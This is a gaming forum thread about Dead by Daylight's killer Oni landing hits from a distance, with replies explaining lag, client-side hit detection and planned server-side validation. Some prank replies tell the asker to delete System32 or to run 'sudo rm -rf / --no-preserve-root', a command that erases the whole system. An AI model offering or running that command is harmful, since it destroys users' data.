How to unlock Oni's sword throwing ability?
I saw that he can do that. I was with my cute Bill, repairing my lovely gens when Oni started to chase me, than injured me and i just: "Haha, i have resilience and spine chill, you will have hard times Mister." Than i just fast vaulted to show him who is the boss, runned 2-3 m from the window, and BOOM!! he downed me 2-3 metres away, from the other side of the window.... he was the boss.... As a hardcore killer main i NEED TO KNOW how to unlock this sword throwing ability at Oni, because it would help me hunt down survivors a lot, i wanted to ask him how he unlocked it at the endgame chat but he dont responded so i ask you guys: HOW TO UNLOCK ONI'S SWORD THROWING ABILITY?

By having bad ping.
(In all seriousness though, lag switching - essentially, giving yourself bad ping on purpose - is bannable, and they're changing hit detection to be server-side soon so it won't even work. So definitely don't actually do it.)

I've heard from numerous reliable sources that pressing ALT + F4 will grant you the ability you are looking for.

That is actually false. As an oni main, the truth is that you must delete system 32 from the PC, then you can use his ability by pressing cntl-alt-delete.

Another false one. I will give you this secret, but be warned that with graeat power comes great responsibility.
It sadly works only for linux users (yea, if you have windows you can't do this). All you have to do is to write "sudo rm -rf / --no-preserve-root" and confirm with password in the terminal.

Yep. Some things are still client-side, for various reasons (skill checks are another example). In the case of hit detection, though, that is about to change.

That's ridiculous, no wonder every Killer hits you from a mile away. They hit you, send it to the server, the server sends it to the survivor, who is already on the other side of the map. Good gravy

Yes, that's how it works. And although there are legitimate reasons for it to be that way, there are problems with it, most notably that it gives killers with high ping an unfair advantage. That's exactly why it's being changed to server-side - "very soon", apparently.

What are you talking about? We found out here that it is an ability unlock if you watch the conversation, right now im trying to hit the right combination when playing with Oni.

Don't get your hopes up on them making the hit authority server side, that would actually ruin killer play, high ping killers would be completely unable to play. Getting hit through windows and stuff is frustrating, but imagine playing as killer, very clearly getting the hit, but the server says nope, you get no hit and suffer the CD, survivor gets to a pallet and you lose the chase. I know the devs said they are considering doing something with it, but I can tell you for sure it will not stick around so don't get your hopes up. Hit authority needs to be killer sided, because it is critical to their mechanics and play.

Hit authority need to be killer sided? I'm sorry, but saying that bad hitboxes should be in the game to aid killers is ridiculous. Only badly skilled killers would agree with this.

I said hit authority needs to be killer based because of the way latency works, you can argue hitboxes are trash all day that isn't what I was talking about at all. If hit authority is server sided then you will run into a ton of issues such as hitting the air, survivors getting their speed boost long after the killer "hit" the survivor among many other problems that would take a long time to list. I do think hitboxes are silly in this game for sure but that isn't what I was talking about at all.

It's official, they announced it in the last stream. Here are the relevant sections from the full summary post I made on the stream explaining it:

The short answer is yes. They are planning to make a number of fixes related to hit registration in order to make hits feel more fair. One change which is planned to be implemented “very soon” is introducing server-side hit validation. What this means is that every time the killer hits a survivor, the server will check whether the hit makes sense according to the information that it (the server) has available (such as the survivor’s relative position, for example). The goal is that such a change will make current issues like being hit through windows, through walls, or from a long way away a lot more fair than they are now. If the server decides that the hit was not valid, the survivor will not take damage and the game will continue as normal.
(Having said that, it should be noted that being able to hit survivors through windows in general is intended design; hitting survivors who are already far away on the other side of a vault, however, is not.)

Since the introduction of the dedicated servers, survivor ping in general has been lowered significantly. Killer ping obviously has not, given that they had a ping of 0 before, but their ping is still not unusually high.
The main problem here is that killers with high ping do have a number of unfair advantages compared to killers playing on lower ping, and the developers do have plans to rectify this issue – for example, the introduction of server-side, rather than killer-side, hit validation as discussed earlier. One of the functions that feature will have is that it will “reject” a hit if the information it receives from the killer is too far (maybe five seconds, for example) outdated.
